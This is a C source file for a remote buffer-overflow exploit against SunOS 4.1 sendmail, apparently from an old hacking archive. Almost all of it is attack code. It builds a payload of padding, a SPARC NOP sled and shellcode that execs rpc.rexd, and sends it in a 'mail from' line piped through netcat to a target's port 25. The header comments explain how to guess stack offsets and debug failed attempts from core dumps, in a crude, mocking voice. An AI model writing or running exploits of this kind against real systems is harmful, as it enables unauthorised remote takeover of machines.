/*
 *  Overflow for Sunos 4.1 sendmail - execs /usr/etc/rpc.rexd.
 *  If you don't know what to do from there, kill yourself.
 *  Remote stack pointer is guessed, the offset from it to the code is 188.
 *
 *  Use:    smrex buffersize padding |nc hostname 25
 *
 *  where `padding` is a small integer, 1 works on my sparc 1+
 *
 *  I use smrex 84 1, play with the numbers and see what happens.  The core
 *  gets dumped in /var/spool/mqueue if you fuck up, fire up adb, hit $r and
 *  see where your offsets went wrong :)
 *
 *  I don't *think* this is the 8lgm syslog() overflow - see how many versions
 *  of sendmail this has carried over into and let me know.  Or don't, I
 *  wouldn't :)
 *
 *  P.S. I'm *sure* there are cleverer ways of doing this overflow.  So sue
 *  me, I'm new to this overflow business..in my day everyone ran YPSERV and
 *  things were far simpler... :)
 *
 *  The Army of the Twelve Monkeys in '98 - still free, still kicking arse.
 */

#include <stdio.h>

int main(int argc, char **argv)
{
  long unsigned int large_string[10000];
  int i, prelude;
  unsigned long offset;
  char padding[50];

  offset  = 188;                          /* Magic numbers */
  prelude = atoi(argv[1]);

  if (argc < 2)
    {
      printf("Usage: %s  bufsize <alignment offset> | nc target 25\n",
             argv[0]);
      exit(1);
    }

  for (i = 6; i < (6 + atoi(argv[2])); i++)
    {
      strcat(padding, "A");
    }
  for(i = 0; i < prelude; i++)
    {
      large_string[i] = 0xfffffff0;       /* Illegal instruction */
    }

  large_string[prelude] = 0xf7ffef50;     /* Arbitrary overwrite of %fp */

  large_string[prelude + 1] = 0xf7fff00c; /* Works for me; address of code */

  for( i = (prelude + 2); i < (prelude + 64); i++)
    {
      large_string[i] = 0xa61cc013;       /* Lots of sparc NOP's */
    }

  /* Now the sparc execve /usr/etc/rpc.rexd code.. */

  large_string[prelude + 64] = 0x250bcbc8;
  large_string[prelude + 65] = 0xa414af75;
  large_string[prelude + 66] = 0x271cdc88;
  large_string[prelude + 67] = 0xa614ef65;
  large_string[prelude + 68] = 0x291d18c8;
  large_string[prelude + 69] = 0xa8152f72;
  large_string[prelude + 70] = 0x2b1c18c8;
  large_string[prelude + 71] = 0xaa156e72;
  large_string[prelude + 72] = 0x2d195e19;
  large_string[prelude + 73] = 0x900b800e;
  large_string[prelude + 74] = 0x9203a014;
  large_string[prelude + 75] = 0x941ac00b;
  large_string[prelude + 76] = 0x9c03a104;
  large_string[prelude + 77] = 0xe43bbefc;
  large_string[prelude + 78] = 0xe83bbf04;
  large_string[prelude + 79] = 0xec23bf0c;
  large_string[prelude + 80] = 0xdc23bf10;
  large_string[prelude + 81] = 0xc023bf14;
  large_string[prelude + 82] = 0x8210203b;
  large_string[prelude + 83] = 0xaa103fff;
  large_string[prelude + 84] = 0x91d56001;
  large_string[prelude + 85] = 0xa61cc013;
  large_string[prelude + 86] = 0xa61cc013;
  large_string[prelude + 87] = 0xa61cc013;
  large_string[prelude + 88] = 0;

  /* And finally, the overflow..simple, huh? :) */
  printf("helo\n");
  printf("mail from: %s%s\n", padding, large_string);
}
/*                    www.hack.co.za              [2000]*/